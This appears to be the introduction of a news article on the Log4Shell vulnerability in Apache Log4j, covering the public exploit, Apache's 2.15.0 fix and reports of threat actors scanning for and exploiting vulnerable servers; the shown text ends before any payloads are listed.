Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we have compiled the known payloads, scans, and attacks using the Log4j vulnerability.
Early Friday morning, an exploit was publicly released for a critical zero-day vulnerability dubbed ‘Log4Shell’ in the Apache Log4j Java-based logging platform. This vulnerability allows attackers to remotely execute a command on a vulnerable server simply by searching for or changing their browser’s user agent to a special string.
Soon after, Apache released Log4j 2.15.0 to resolve the vulnerability, but threat actors had already started to scan for and exploit vulnerable servers to exfiltrate data, install malware, or take over the server.
As this software is used in thousands of enterprise applications and websites, there is significant concern that it will lead to widespread attacks and malware deployment.
Below we outline the known attacks currently exploiting the Log4j vulnerability.